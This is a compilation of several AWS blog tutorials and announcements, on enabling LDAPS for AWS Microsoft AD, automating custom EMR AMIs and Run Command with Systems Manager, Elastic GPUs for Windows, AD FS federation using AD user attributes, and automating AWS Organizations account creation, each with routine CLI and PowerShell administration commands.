Retrieve the SubordinateCA certificate – Retrieve the SubordinateCA certificate by running the following command using Windows PowerShell with administrative privileges. The command includes the <RequestId> that you noted in the previous step.

certreq -retrieve <RequestId> <drive>:\subordinateCA.crt

Upload SubordinateCA.crt to the S3 bucket.

Install the SubordinateCA certificate – Log in to SubordinateCA as the CAAdmin and download SubordinateCA.crt from the S3 bucket. Install the certificate by running the following commands using Windows PowerShell with administrative privileges.

certutil -installcert c:\subordinateCA.crt
start-service certsvc

Delete the content that you uploaded to S3 – As a security best practice, delete all the certificates and CRLs that you uploaded to the S3 bucket in the previous steps because you already have installed them on SubordinateCA.

You have finished setting up the subordinate Microsoft enterprise CA that is joined to your AWS Microsoft AD directory domain. Now you can use your subordinate Microsoft enterprise CA to create a certificate template so that your directory domain controllers can request a certificate to enable LDAPS for your directory.

Step 3: Create a certificate template

In this step, you create a certificate template with server authentication and autoenrollment enabled on SubordinateCA. You create this new template (in this case, ServerAuthentication) by duplicating an existing certificate template (in this case, Domain Controller template) and adding server authentication and autoenrollment to the template.

You have finished creating a certificate template with server authentication and autoenrollment enabled on SubordinateCA. Your AWS Microsoft AD directory domain controllers can now obtain a certificate through autoenrollment to enable LDAPS.

Step 4: Configure AWS security group rules

In this step, you configure AWS security group rules so that your directory domain controllers can connect to the subordinate CA to request a certificate. To do this, you must add outbound rules to your directory’s AWS security group (in this case, sg-4ba7682d) to allow all outbound traffic to SubordinateCA’s AWS security group (in this case, sg-6fbe7109) so that your directory domain controllers can connect to SubordinateCA for requesting a certificate. You also must add inbound rules to SubordinateCA’s AWS security group to allow all incoming traffic from your directory’s AWS security group so that the subordinate CA can accept incoming traffic from your directory domain controllers.
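
You can add both rules in the Amazon EC2 console or with the AWS CLI; the following is a sketch using the security group IDs above:

# Outbound rule on the directory's security group, allowing all traffic to SubordinateCA's security group
aws ec2 authorize-security-group-egress \
    --group-id sg-4ba7682d \
    --ip-permissions '[{"IpProtocol":"-1","UserIdGroupPairs":[{"GroupId":"sg-6fbe7109"}]}]'

# Inbound rule on SubordinateCA's security group, allowing all traffic from the directory's security group
aws ec2 authorize-security-group-ingress \
    --group-id sg-6fbe7109 \
    --ip-permissions '[{"IpProtocol":"-1","UserIdGroupPairs":[{"GroupId":"sg-4ba7682d"}]}]'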

You have completed the configuration of AWS security group rules to allow traffic between your directory domain controllers and SubordinateCA.

Step 5: AWS Microsoft AD enables LDAPS

The AWS Microsoft AD domain controllers perform this step automatically by recognizing the published template and requesting a certificate from the subordinate Microsoft enterprise CA. The subordinate CA can take up to 180 minutes to issue certificates to the directory domain controllers. The directory imports these certificates into the directory domain controllers and enables LDAPS for your directory automatically. This completes the setup of LDAPS for the AWS Microsoft AD directory. The LDAP service on the directory is now ready to accept LDAPS connections!

Step 6: Test LDAPS access by using the LDP tool

In this step, you test the LDAPS connection to the AWS Microsoft AD directory by using the LDP tool. The LDP tool is available on the Management machine where you installed Active Directory Administration Tools. Before you test the LDAPS connection, you must wait up to 180 minutes for the subordinate CA to issue a certificate to your directory domain controllers.

To test LDAPS, you connect to one of the domain controllers using port 636. Here are the steps to test the LDAPS connection:

Switch to the tree view and navigate to corp.example.com > CORP > Domain Controllers. In the right pane, right-click on one of the domain controllers and choose Properties. Copy the DNS name of the domain controller.

Launch the LDP.exe tool by launching Windows PowerShell and running the LDP.exe command.

In the LDP tool, choose Connection > Connect.

In the Server box, paste the DNS name you copied in the previous step. Type 636 in the Port box. Choose OK to test the LDAPS connection to port 636 of your directory.

You should see the following message to confirm that your LDAPS connection is now open.

You have completed the setup of LDAPS for your AWS Microsoft AD directory! You can now encrypt LDAP communications between your Windows and Linux applications and your AWS Microsoft AD directory using LDAPS.

Summary

In this blog post, I walked through the process of enabling LDAPS for your AWS Microsoft AD directory. Enabling LDAPS helps you protect PII and other sensitive information exchanged over untrusted networks between your Windows and Linux applications and your AWS Microsoft AD. To learn more about how to use AWS Microsoft AD, see the Directory Service documentation. For general information and pricing, see the Directory Service home page.

If you have comments about this blog post, submit a comment in the “Comments” section below. If you have implementation or troubleshooting questions, start a new thread on the Directory Service forum.

Amazon EMR lets you have complete control over your cluster, giving you the flexibility to customize a cluster and install additional applications easily. EMR customers often use bootstrap actions to install and configure custom software in a cluster. However, bootstrap actions only run during the cluster or node startup. This makes it difficult for you to make configuration changes after a cluster is already running.

EMR clusters can also use a custom Amazon Machine Image (AMI). With the new support for launching clusters with custom Amazon Linux AMIs, customizing an EMR cluster is now even easier. However, the task of creating and managing custom AMIs can become increasingly difficult as the number of AMIs in your environment starts to increase.

Amazon EC2 Systems Manager helps you automate various management tasks such as automating AMI creation or running a command or script across hundreds of instances. In this post, I show how Systems Manager Automation can be used to automate the creation and patching of custom Amazon Linux AMIs for EMR.

Systems Manager Run Command lets you remotely manage the configuration of Amazon EC2 instances or on-premises machines. Run Command can be used to help you perform the following types of tasks on your EMR cluster nodes: install applications, restart daemons (HDFS, YARN, Presto, etc.), and make configuration changes. I also show how you can use Run Command to send commands to all nodes of a running EMR cluster.

Benefits of using a custom AMI

Although you can easily customize an EMR cluster using bootstrap actions, there can be benefits to using a custom AMI.

Reduction of cluster start time

There are certain scenarios where a bootstrap action may affect your cluster start time. For example, your bootstrap action could be doing something like downloading a large program over the internet and delaying the time for your cluster to be ready. By adding and installing a program directly in the AMI, the time to complete a cluster launch may be reduced.

Prevent unexpected bootstrap action failures

There are also scenarios where installing and configuring custom software directly in the AMI reduces the risk of unexpected failures. For example, a mirror or repo used by your bootstrap action to download a program might be offline or inaccessible. This could cause your bootstrap action to fail, which could cause a cluster launch failure.

Support for Amazon EBS root volume encryption

A number of security and encryption features are available with EMR security configurations. This includes the ability to encrypt data at rest for HDFS (local volumes/Amazon EBS) and Amazon S3. However, certain regulatory/compliance policies may require that the root (boot) volume is also encrypted. By bringing your own Amazon Linux AMI, you can create AMIs that use encrypted EBS root volumes and use those AMIs for your EMR clusters.

Walkthrough

For the examples in this post, I show how you can set up the following solutions:

Automate a workflow of creating custom AMIs with pre-installed software

Run commands or make application configuration changes on all nodes of a running EMR cluster

Before you begin

In this post, the AWS CLI is used to execute the examples and steps shown. However, having the AWS CLI installed is not a requirement and the AWS Management Console can be used to perform the same tasks.

The region used for the examples is us-east-1 (N. Virginia).

Building a custom AMI with Systems Manager Automation

In this section, I show how you can use Automation to create a custom AMI. The following diagram shows an overview of the actions that the Automation will perform:

1) Configure roles for Automation

Before getting started, you have to configure an IAM instance profile role and a service role that Automation can use. The instance profile role gives Automation permission to perform actions on your instances, such as executing commands or starting and stopping services. The service role (or assume role) gives Automation permissions to perform actions on your behalf.

Configuring the required IAM roles for Automation is usually one of the hardest parts of setting up Automation. Luckily, you only do this step one time. We also have an AWS CloudFormation template that can be used to create and configure the required roles for Automation. For more information, see Method 1: Using AWS CloudFormation to Configure Roles for Automation.

2) Create a custom Automation document

An Automation document defines the actions that Systems Manager performs. In this step, you create a custom Automation document (customEmrAmiDocument) that performs the following steps:

Launch an EC2 instance from a base Amazon Linux AMI

Update installed software on the instance

Run additional Linux commands (optional)

Shut down the instance

Create an AMI of the instance

Terminate the instance

To create a custom Automation document, first download the customEmrAmiDocument.json document to your local machine. You can then use the console, AWS CLI, or AWS SDKs to create (upload) that Automation document in your account. The following example shows how to create an Automation document called “customEmrAmiDocument” using the AWS CLI:
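
# A sketch of the create call; customEmrAmiDocument.json is assumed to be in the current directory
aws ssm create-document \
    --name "customEmrAmiDocument" \
    --content file://customEmrAmiDocument.json \
    --document-type "Automation"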

Note: Creating an Automation document does not cause that document to be executed; you execute the document in the next step. Also note that the content file must be referenced with a file:// prefix followed by the path to the file.

3) Executing the custom Automation document

The “customEmrAmiDocument” Automation document created in the previous step has a list of parameters (SourceAmiId, InstanceIamRole, etc.), along with the description of each parameter. To describe the document parameters, run the following command:
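
# Describe the document, including its parameters and their default values
aws ssm describe-document --name "customEmrAmiDocument"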

When you start an Automation execution, you must pass the required parameters (SourceAmiId) along with any additional parameters for which you would like to override the default value. For example, if you used CloudFormation to create the required IAM roles, you do not need to specify the InstanceIamRole and AutomationAssumeRole parameters.

To execute the document without including the InstanceIamRole and AutomationAssumeRole parameters, run the following command:
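
# A sketch of the minimal execution call, passing only the required SourceAmiId
aws ssm start-automation-execution \
    --document-name "customEmrAmiDocument" \
    --parameters "SourceAmiId=ami-4fffc834"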

If your role names or ARNs have different values than the defaults, make sure that you specify those parameters accordingly. For example, if your instance profile/role is called “MyManagedInstanceProfile” and the Automation service role ARN is “arn:aws:iam::012345678910:role/MyAutomationServiceRole”, then your parameters to execute the Automation should be similar to the following:
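
# A sketch; the parameter names must match those defined in the Automation document
aws ssm start-automation-execution \
    --document-name "customEmrAmiDocument" \
    --parameters "SourceAmiId=ami-4fffc834,InstanceIamRole=MyManagedInstanceProfile,AutomationAssumeRole=arn:aws:iam::012345678910:role/MyAutomationServiceRole"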

I chose “ami-4fffc834” for the SourceAmiId parameter because it’s the latest Amazon Linux AMI in the us-east-1 (N. Virginia) region at the time of publication. It also has all the requirements needed for EMR custom AMIs. If you’re running your Automation document in a different region, set the SourceAmiId parameter to an AMI that’s available in that particular region (ex: “ami-aa5ebdd2” for us-west-2).

4) Finding details about the Automation execution

After the Automation execution is complete, you can view the steps that were executed in addition to the status of each step and their output. To view all Automation executions that used the “customEmrAmiDocument” document, you can run the following command:
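
# A sketch; the DocumentNamePrefix filter matches executions of documents whose names start with this value
aws ssm describe-automation-executions \
    --filters "Key=DocumentNamePrefix,Values=customEmrAmiDocument"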

The output of the preceding command contains details about each step executed by the Automation execution. To easily find the AMI ID/imageID of the AMI created during the Automation createImage step, run the following command:
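
# A sketch; <ExecutionId> comes from the previous command's output, and the step name
# createImage is assumed to match the image-creation step in the Automation document
aws ssm get-automation-execution \
    --automation-execution-id <ExecutionId> \
    --query "AutomationExecution.StepExecutions[?StepName=='createImage'].Outputs"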

For information about how to find the AMI ID of the custom AMI created by Automation, see step 4.

Using Run Command with EMR

In this section, I show how you can use Run Command to send commands to the nodes of a running EMR cluster. The following diagram shows an overview of a Run Command execution:

1) Configure the instance IAM role for Systems Manager

EC2 instances (EMR cluster nodes) need an IAM role to be able to communicate with the Systems Manager API. Because EMR already assigns an IAM role (usually called EMR_EC2_DefaultRole) to each cluster node, you can attach an additional managed policy (Systems Manager policy) to that role.

The following command attaches the “AmazonEC2RoleforSSM” managed policy to the EMR_EC2_DefaultRole role:
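
# Attach the Systems Manager managed policy to the EMR EC2 instance role
# (verify the policy ARN in the IAM console if it differs in your account)
aws iam attach-role-policy \
    --role-name EMR_EC2_DefaultRole \
    --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM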

2) Install the SSM Agent

Skip this step if your custom AMI was created by Automation. The customEmrAmiDocument Automation document that you used to create the custom AMI installs the SSM agent by default.

The Systems Manager (SSM) agent is used to process System Manager requests and configure your instances as specified in the request. For more information, see Installing SSM Agent on Linux.

3) Running a command with Run Command

You should now be able to run commands or Linux scripts on the instances that have the SSM agent running and the IAM role for SSM configured (Step 1 in this section). To view a list of instances that are ready to receive commands, run the following command:
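
# List managed instances registered with Systems Manager, along with their ping status
aws ssm describe-instance-information \
    --query "InstanceInformationList[*].[InstanceId,PingStatus,PlatformName]" \
    --output table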

The easiest way to send a command to all cluster nodes is by using a resource tag as the target for Run Command. If you didn’t add any tags to your EMR cluster during launch, you can add tags using the following command:
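
# A sketch; the cluster ID is a placeholder, and EMR propagates cluster tags to the underlying EC2 instances
aws emr add-tags --resource-id j-XXXXXXXXXXXXX --tags environment="emr-ssm"

With the tag in place, you can send a command to every tagged instance; the following sketch uses the AWS-RunShellScript document to run the commands discussed below:

aws ssm send-command \
    --targets "Key=tag:environment,Values=emr-ssm" \
    --document-name "AWS-RunShellScript" \
    --parameters '{"commands":["hostname -f","python3 -V"]}'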

The preceding command is sent (executed) to all EC2 instances that have the following tags: environment=”emr-ssm”.

4) Finding details on a Run Command execution

The send-command call executed in the previous step runs two commands on each targeted instance: one that shows the instance's host name (hostname -f) and one that shows its Python 3 version (python3 -V).

After executing the Run Command (send-command), it should return a “CommandID” field in the output. You can use that command ID to gather information on the instances that the command was sent to and to view the status of the command execution:
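
# Overall status of the command
aws ssm list-commands --command-id "<CommandId>"

# Per-instance status and output
aws ssm list-command-invocations --command-id "<CommandId>" --details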

Conclusion

This post showed you some of the benefits of using custom AMIs for Amazon EMR and how you can use Automation to automate the management and creation of custom AMIs. I also showed how Run Command can be used to send commands and make configuration changes on all nodes of a running EMR cluster.

If you have questions or suggestions, please comment below.

About the Author

Bruno Faria is an EMR Solution Architect with AWS. He works with our customers to provide them architectural guidance for running complex applications on Amazon EMR. In his spare time, he enjoys spending time with his family and learning about new big data solutions.

Today we’re excited to announce the general availability of Amazon EC2 Elastic GPUs for Windows. An Elastic GPU is a GPU resource that you can attach to your Amazon Elastic Compute Cloud (EC2) instance to accelerate the graphics performance of your applications. Elastic GPUs come in medium (1GB), large (2GB), xlarge (4GB), and 2xlarge (8GB) sizes and are lower cost alternatives to using GPU instance types like G3 or G2 (for OpenGL 3.3 applications). You can use Elastic GPUs with many instance types allowing you the flexibility to choose the right compute, memory, and storage balance for your application. Today you can provision elastic GPUs in us-east-1 and us-east-2.

Elastic GPUs start at just $0.05 per hour for an eg1.medium. A nickel an hour. If we attach that Elastic GPU to a t2.medium ($0.065/hour) we pay a total of less than 12 cents per hour for an instance with a GPU. Previously, the cheapest graphical workstation (G2/3 class) cost 76 cents per hour. That’s over an 80% reduction in the price for running certain graphical workloads.

When should I use Elastic GPUs?

Elastic GPUs are best suited for applications that require a small or intermittent amount of additional GPU power for graphics acceleration and support OpenGL. Elastic GPUs support up to and including the OpenGL 3.3 API standards with expanded API support coming soon.

Elastic GPUs are not part of the hardware of your instance. Instead they’re attached through an elastic GPU network interface in your subnet which is created when you launch an instance with an Elastic GPU. The image below shows how Elastic GPUs are attached.

Since Elastic GPUs are network attached it’s important to provision an instance with adequate network bandwidth to support your application. It’s also important to make sure your instance security group allows traffic on port 2007.

Any application that can use the OpenGL APIs can take advantage of Elastic GPUs so Blender, Google Earth, SIEMENS SolidEdge, and more could all run with Elastic GPUs. Even Kerbal Space Program!

Ok, now that we know when to use Elastic GPUs and how they work, let’s launch an instance and use one.

Next, we’ll double-check that my security group has TCP port 2007 open to my VPC so my Elastic GPU can connect to my instance; the best way to do this is to create a separate security group with that rule that you can attach to the instance. Finally, we’ll click Launch and wait for my instance and Elastic GPU to provision.
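
A sketch of adding that rule with the AWS CLI (the security group ID and VPC CIDR below are placeholders):

# Allow the Elastic GPU to reach the instance on TCP port 2007 from within the VPC
aws ec2 authorize-security-group-ingress \
    --group-id sg-0123456789abcdef0 \
    --protocol tcp \
    --port 2007 \
    --cidr 172.31.0.0/16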

You can see an animation of the launch procedure below.

Alternatively we could have launched on the AWS CLI with a quick call like this:
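
# A sketch of the launch call; the AMI, key pair, subnet, and security group IDs are placeholders
aws ec2 run-instances \
    --image-id ami-xxxxxxxx \
    --instance-type t2.medium \
    --key-name my-key-pair \
    --security-group-ids sg-0123456789abcdef0 \
    --subnet-id subnet-xxxxxxxx \
    --elastic-gpu-specification Type=eg1.medium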

Then we could have followed the Elastic GPU software installation instructions here.

We can now see our Elastic GPU is humming along and attached by checking out the Elastic GPU status in the taskbar.

We welcome any feedback on the service and you can click on the Feedback link in the bottom left corner of the GPU Status Box to let us know about your experience with Elastic GPUs.

Elastic GPU Demonstration

Ok, so we have our instance provisioned and our Elastic GPU attached. My teammates here at AWS wanted me to talk about the amazingly wonderful 3D applications you can run, but when I learned about Elastic GPUs the first thing that came to mind was Kerbal Space Program (KSP), so I’m going to run a quick test with that. After all, if you can’t launch Jebediah Kerman into space then what was the point of all of that software? I’ve downloaded KSP and added the launch parameter of -force-opengl to make sure we’re using OpenGL to do our rendering. Below you can see my poor attempt at building a spaceship – I used to build better ones. It looks pretty smooth considering we’re going over a network with a lossy remote desktop protocol.

I’d show a picture of the rocket launch but I didn’t even make it off the ground before I experienced a rapid unscheduled disassembly of the rocket. Back to the drawing board for me.

In the meantime I can check my Amazon CloudWatch metrics and see how much GPU memory I used during my brief game.

Partners, Pricing, and Documentation

To continue to build out great experiences for our customers, our 3D software partners like ANSYS and Siemens are looking to take advantage of the OpenGL APIs on Elastic GPUs, and are currently certifying Elastic GPUs for their software. You can learn more about our partnerships here.

You can find information on Elastic GPU pricing here. You can find additional documentation here.

To govern federated access to your AWS resources, it’s a common practice to use Microsoft Active Directory (AD) groups. When using AD groups, establishing federation requires the number of AD groups to be equal to the number of your AWS accounts multiplied by the number of roles in each of your AWS accounts. As you can imagine, this can result in the creation of a very large number of AD groups to manage federated access.

However, some organizations have limits on how many AD groups they can create. For example, an organization might need to keep its AD group hierarchy reasonably flat and avoid a deep nesting of groups. Such a situation needs a solution that doesn’t require you to create exponentially more AD groups while still allowing you to use access control and automated user integration.

In this blog post, I provide step-by-step instructions for integrating AWS Identity and Access Management (IAM) with Microsoft Active Directory Federation Services (AD FS) by using AD user attributes, allowing you to establish federated access without expanding your total number of AD groups. Your organization’s enterprise administrator probably has existing processes in place for managing AD group memberships and provisioning, and you can extend these processes to the management of AD user attributes and the reduction of your organization’s dependency on AD groups.

Prerequisites

You have created an identity provider (IdP) in your AWS account using your XML file (https://<your-server-name-here>/FederationMetadata/2007-06/FederationMetadata.xml) from your AD FS server. Remember the name of your IdP because you will use it later in this solution. (A sample CLI call for creating the IdP appears after these prerequisites.)

You have created the appropriate IAM roles in your AWS account, which will be used for federated access.
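If you have not yet created the IdP, a minimal sketch of doing so with the AWS CLI follows, assuming you have saved the federation metadata document locally and want to name the provider myADFS (both the file name and the provider name are placeholders):

aws iam create-saml-provider --saml-metadata-document file://FederationMetadata.xml --name myADFS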

After you satisfy these prerequisites, you can proceed to the next section of this post to configure your AD users and AD FS server.

Solution overview

To benefit fully from the solution in this post, your AD and AD FS environment should look similar to what is shown in the following diagram. I focus this post on AD users and claim rules in an AD FS server. AD FS claim rules provide the logic to identify who has been correctly set up in AD with the appropriate user attributes to sign in via AD FS to the AWS Management Console.

In the preceding diagram:

An AD user (let’s call him Bob) browses to the AD FS sample site (https://Fully.Qualified.Domain.Name.Here/adfs/ls/IdpInitiatedSignOn.aspx) inside this domain.

The sign-in page authenticates Bob against AD. If Bob is not already authenticated (for example, if he is not signed in on a domain-joined workstation), he is prompted for his AD user name and password.

Bob’s browser receives a SAML assertion in the form of an authentication response from AD FS. Bob’s access is authorized based on his AD group membership or on AD user attributes configured on his account.

Bob’s browser automatically posts the SAML assertion to the AWS sign-in endpoint for SAML (https://signin.aws.amazon.com/saml). The endpoint uses the AssumeRoleWithSAML API to request temporary security credentials and then constructs a sign-in URL for the AWS Management Console using those credentials.

Bob’s browser receives the sign-in URL and redirects to the AWS Management Console.

Deploy the solution

A. Configure an AD user’s account

Because the AD user attributes hold all the associated AWS account and role information when using this solution, you will start by configuring an AD user’s account.

To edit the user attributes in an AD user’s account:

On your AD server, open the Active Directory Users and Computers console and go to View > Advanced Features so that the Attribute Editor tab is visible.

For AD user Bob, edit one attribute using the built-in AD attribute editor. The attribute I am using is url, which is a multi-valued string. If you use another AD user attribute, consider how you will need to modify your AD FS claim rules later because different attributes may return the values differently back to the AD FS server. The name of the AD user attribute will be used in the AD FS claim rules later in this post.

Bob has two AWS accounts: 111122223333 and 444455556666. Each of Bob’s AWS accounts has two roles: AWS-Dev and AWS-ReadOnly. I have configured Bob’s url attribute with the corresponding values associated with his AWS accounts and roles. As part of the attribute entries, I prefixed each entry with AWS- to have a unique identifier. As shown in the following screenshot, I added the entries one at a time so that each value can be returned back to my AD FS server:

AWS-111122223333-Dev

AWS-111122223333-ReadOnly

AWS-444455556666-Dev

AWS-444455556666-ReadOnly

Bob also requires an email address because that information will be used in the role session name when Bob signs in to the AWS Management Console via his chosen AWS account and associated role. We use Bob’s email address only because it’s a common user attribute most users have and is also unique across users. The unique identifier is then forwarded by AD FS to be used by AWS as a unique value for users. If you have enabled AWS CloudTrail, the role session name is captured in CloudTrail and allows for ease of identification of who assumed the role and subsequent API calls the user or role might have executed on the platform (for example, ec2:terminateinstance).

Now that you have configured Bob’s account, you will configure the AD FS server claim rules.

B. Configure the AD FS server claim rules

Because this blog post assumes your environment is already up and running and to ensure that you can follow along, I am providing example Windows PowerShell code that you can run on your AD FS server. This code allows you to choose a conventional approach by using AD groups in AD FS claim rules, or for the purposes of this post, to use AD FS claim rules with AD user attributes. If you use the AD group approach on your AD FS server with the example code, your AD group naming convention must be: AWS-YourAccountNumber-YourRoleName. If you have already created claim rules for AWS on your AD FS server, I encourage you to run this code against a different AD FS server that has no existing AWS rules.

To configure the AD FS claim rules:

Open the AD FS console. You can find it by searching for ad, as shown in the following screenshot.

Expand Trust Relationships and choose Relying Party Trusts.

Run the example Windows PowerShell code from the command prompt in the same directory where you extracted the .zip file. The following screenshot shows a list of the example files from the .zip file.

Run the 01-Configure-ADFS-AD-User-URL-mapping.ps1 Windows PowerShell script to set up the AD FS claim rules. Note: Run this script with Administrative permissions. A log file is generated to which you can refer, as shown in the following screenshot.

After you run the Windows PowerShell script, you will see the new relying party trust that has been created in your AD FS configuration for Amazon Web Services, as shown in the following screenshot.

The following screenshot shows what your AD FS server claim rules should look like now.

About these four claim rules:

Claim rule 1 captures the Windows account name of the current user whose attributes will then be queried further with claim rule 3.

Claim rule 2 captures Bob’s email address for use in the role session name.

Claim rule 3 queries the current user’s URL attributes to identify which account and role the user is authorized to assume access to. These URL attribute values are then stored in a variable (http://temp/variable) for use in claim rule 4.

Claim rule 4 works by matching the first pattern match, (\d{12}), to $1 and the second pattern match, (\w*), to $2 for each entry in http://temp/variable. With this final rule, you define the resulting value for the AWS role attribute in a dynamic way, which allows the configuration to scale to support virtually any number of AWS accounts and IAM roles without further configuration within AD FS. By using these claim rules, you query, store, and then convert the values in the URL attributes to the IAM role attributes that AWS expects.

At the beginning of this post, I mentioned that you need to remember the name of the IdP you created in your AWS account, and now is when you will use your IdP’s name. Replace myADFS, highlighted in the following code, with the name of your IdP. (When modifying the rules, be careful not to insert any additional spaces because they can cause claim rules to not work as designed.)

C. Test AD user Bob’s federated access

Go to the AD FS sign-in page (https://Fully.Qualified.Domain.Name.Here/adfs/ls/IdpInitiatedSignOn.aspx) to test Bob’s federated access. Note that you might see a certificate warning if the server uses a locally self-signed certificate from Internet Information Services.

To test Bob’s federated access:

Choose Sign in to one of the following sites, choose Amazon Web Services & AD User URL from the list, and then choose Continue to Sign In.

If prompted, type Bob’s user name and password. You will be redirected to sign in to the Amazon Web Services AD FS page previously defined when you set up the AD FS relying party trusts.

After you authenticate to the server as Bob, your browser is redirected to https://signin.aws.amazon.com/saml, where you can choose which of Bob’s accounts and roles to use. Choose a role and then choose Sign In.

You have signed in as Bob, and his email address now appears as part of the role session name, as shown in the following screenshot.

You can now see Bob’s email address used in the role session name. If you have enabled CloudTrail, the role session name is captured in CloudTrail and allows you to easily identify who assumed the role. If Bob wants to switch to a different account or role, he can return to his AD FS sign-in page (https://Fully.Qualified.Domain.Name.Here/adfs/ls/IdpInitiatedSignOn.aspx) and choose an alternative account or role.

Summary

In this blog post, I demonstrated how to use dynamic resolution of federated access using AD user attributes to scale your configuration and support a large number of AWS accounts and associated IAM roles. This is a powerful technique for managing a large number of AWS accounts and the federated access of associated AD users. Even though I demonstrate the integration of IAM with AD FS and AD, you can replicate this solution across your choice of SAML federated access technology, such as Shibboleth or OpenLDAP.

If you have comments about this blog post, submit them in the “Comments” section below. If you have implementation or troubleshooting questions, start a new thread on the IAM forum.

In this blog post, I demonstrate the step-by-step process for end-to-end account creation in Organizations as well as how to automate the entire process. I also show how to move a new account into an organizational unit (OU).

Process overview

The following process flow diagram illustrates the steps required to create an account, configure the account, and then move it into an OU so that the account can take advantage of the centralized SCP functionality in Organizations. The tasks in the blue nodes occur in the master account in the organization in question, and the task in the orange node occurs in the new member account I create. In this post, I provide a script (in both Bash/CLI and Python) that you can use to automate this account creation process, and I walk through each step shown in the diagram to explain the process in detail. For the purposes of this post, I use the AWS CLI in combination with CloudFormation to create and configure an account.

The account creation process

Follow the steps in this section to create an account, configure it, and move it into an OU. I am also providing a script and CloudFormation templates that you can use to automate the entire process.

1. Sign in to AWS Organizations

In order to create an account, you must sign in to your organization’s master account with a minimum of the following permissions:

organizations:DescribeOrganization

organizations:CreateAccount

2. Create a new member account

After signing in to your organization’s master account, create a new member account. Before you can create the member account, you need three pieces of information:

An account name – The friendly name of the member account, which you can find on the Accounts tab in the master account.

An email address – The email address of the owner of the new member account. This email address is used by AWS when we need to contact the account owner.

An IAM role name – The name of an IAM role that Organizations automatically preconfigures in the new member account. This role trusts the master account, allowing users in the master account to assume the role, as permitted by the master account administrator. The role also has administrator permissions in the new member account. If you do not change the role’s name, the name defaults to OrganizationAccountAccessRole.
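A minimal sketch of the create-account call, using placeholder values that are explained next, looks like this:

aws organizations create-account --email newAccEmail --account-name newAccName --role-name roleName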

To explain the placeholder values in the preceding command that you must update with your own values:

newAccEmail – The email address of the owner of the new member account. This email address must not already be associated with another AWS account.

newAccName – The friendly name of the new member account.

roleName – The name of an IAM role that Organizations automatically preconfigures in the new member account. The default name is OrganizationAccountAccessRole.

This CLI command returns a request_id that uniquely identifies the request, a value that is required in Step 3.

Important: When you create an account using Organizations, you currently cannot remove this account from your organization. This, in turn, can prevent you from later deleting the organization.

3. Verify account creation

Account creation may take a few seconds to complete, so before doing anything with the newly created account, you must first verify the account creation status. To check the status, you must have at least the following permission:

organizations:DescribeCreateAccountStatus

The following CLI command, with the request_id returned in the previous step as an input parameter, verifies that the account was created:
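A sketch of that call, with the request ID as a placeholder:

aws organizations describe-create-account-status --create-account-request-id request_id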

The command returns the state of your account creation request and can have three different values: IN_PROGRESS, SUCCEEDED, and FAILED.

4. Assume a role

After you have verified that the new account has been created, configure the account. In order to configure the newly created account, you must sign in with a user who has permission to assume the role specified in the CreateAccount API call. In the example in Step 2, I used the default role name, OrganizationAccountAccessRole; however, if you revised the name of the role, you must use that revised name when assuming the role. Note that when an account is created from within an organization, cross-account trust between the master account and the programmatically created account is automatically established.
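A minimal sketch of assuming the role with the AWS CLI, using the default role name and a placeholder account ID:

aws sts assume-role --role-arn arn:aws:iam::123456789012:role/OrganizationAccountAccessRole --role-session-name NewAccountSetup

The call returns temporary credentials that you can export as environment variables or store in a named profile before configuring the new account.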

5. Configure the new account

After you assume the role, build the new account’s networking, IAM, and governance resources as explained in this section. Again, to learn more about and download the account creation script and the templates that can automate this process, see “Automating the entire end-to-end process” later in this post.

Create AWS Config rules to help manage and enforce standards for resources deployed on AWS.

Develop a tagging strategy that specifies a minimum set of tags required on every taggable resource. A tagging rule checks that all resources created or edited fulfill this requirement. A noncompliance report is created to document resources that do not meet the AWS Config rule. AWS Lambda scripts can also be launched as a result of AWS Config rules.

6. Move the new account into an OU

Before allowing your development teams to access the new member account that you configured in the previous steps, apply an SCP to the account to limit the API calls that can be made by all users. To do this, you must move the member account into an OU that has an SCP attached to it.

An OU is a container for accounts. It can contain other OUs, allowing you to create a hierarchy that resembles an upside-down tree with a “root” at the top and OU “branches” that reach down, ending with accounts that are the “leaves” of the tree. When you attach a policy to one of the nodes in the hierarchy, it affects all the branches (OUs) and leaves (accounts) under it. An OU can have exactly one parent, and currently, each account can be a member of exactly one OU.
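A minimal sketch of the move-account call, using the placeholder values explained below:

aws organizations move-account --account-id account_id --source-parent-id source_parent_id --destination-parent-id destination_parent_id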

To explain the placeholder values in the preceding command that you must update with your own values:

account_id – The unique identifier (ID) of the account you want to move.

source_parent_id – The unique ID of the root or OU from which you want to move the account.

destination_parent_id – The unique ID of the root or OU to which you want to move the account.

7. Reduce the IAM role permissions

The OrganizationAccountAccessRole is created with full administrative permissions to enable the creation and development of the new member account. After you complete the development process and you have moved the member account into an OU, reduce the permissions of OrganizationAccountAccessRole to match your anticipated use of this role going forward.

Automating the entire end-to-end process

To help you fully automate the process of creating new member accounts, setting up those accounts, and moving new member accounts into an OU, I am providing a script in both Bash/CLI and Python. You can modify or call additional CloudFormation templates as needed.

Download the script and CloudFormation templates

Download the script and CloudFormation templates to help you automate this end-to-end process. The global variables in the script are set in the opening lines of code. Update these variables’ values, and they will flow as input parameters to the API commands when the script is executed. I have prepopulated the roleName by using AWS best practices nomenclature, but you can use a custom name.

I am including the following descriptions of the elements of the script to give you a better idea of how the script works.

Bash/CLI:

Organization-new-acc.sh – An example shell script that includes parameters, account creation, and a call to the JSON sample templates for each of three subtasks in Step 5 earlier in this post.

CF-VPC.json – An example CloudFormation template that creates and configures a VPC in the new member account. Each AWS account must have at least one VPC as a networking construct where you can deploy customer resources. Though AWS does create a default VPC when an account is created, you must configure that VPC to meet your needs. This includes creating subnets with specific IP Classless Inter-Domain Routing (CIDR) blocks, creating gateways (including an Internet gateway, a customer gateway, a VPN tunnel, AWS Storage Gateway, Amazon API Gateway, and a NAT gateway), and creating VPC peering connections. Web ACLs are also part of this process to limit the source IP addresses and ports that can access the VPC. The VPC created by this script includes four subnets across two Availability Zones. Two of the subnets are public and two are private.

CF-IAM.json – An example CloudFormation template that creates IAM roles in the new member account. As part of a security baseline, you should develop a standard set of IAM roles and related policies. Update this template with the IAM role definitions and policies you want to create in the member account to control privileges and access.

CF-ConfigRules.json – An example CloudFormation template that creates an AWS Config rule to enforce tagging standards on resources created in the new account.

Organization_Output.docx – Example output of the results from running Organization-new-acc.sh.

Python:

Create_account_with_iam.py – An example Python template that creates an account, moves it into an OU, applies an SCP, and then calls additional templates to deploy resources. CF-VPC.JSON can be called by this template if you first customize the .json file.

Summary

